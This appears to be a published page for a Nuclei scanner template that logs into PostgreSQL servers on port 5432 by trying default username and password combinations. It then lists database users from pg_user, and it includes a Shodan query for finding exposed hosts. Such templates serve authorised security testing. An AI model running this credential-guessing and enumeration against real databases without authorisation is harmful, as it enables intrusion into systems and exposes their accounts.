PostgreSQL List Users

ID: pgsql-list-users

Severity: high

Author: pussycat0x

Tags: js,network,postgresql,enum,authenticated

Description

List users from Postgresql Database.

YAML Source

id: pgsql-list-users

info:
  name: PostgreSQL List Users
  author: pussycat0x
  severity: high
  description: |
    List users from Postgresql Database.
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
  metadata:
    verified: true
    max-request: 8
    shodan-query: "product:\"PostgreSQL\""
  tags: js,network,postgresql,enum,authenticated
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
      Export(connected);

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"

    payloads:
      usernames:
        - postgres
        - admin
      password:
        - postgres
        -
        - 123
        - amber
      database:
        - postgres

    attack: clusterbomb

    extractors:
      - type: json
        json:
          - '.Rows[].usename'
# digest: 4b0a00483046022100e15705e6d89dcd2932de1244045ce41414118a6b79a2523ad6ae699728f38e57022100df57343de956df6bb1b3777ee9f3ad6f13714553939c1305529cd999ad9929f9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "javascript/enumeration/pgsql/pgsql-list-users.yaml"

View on Github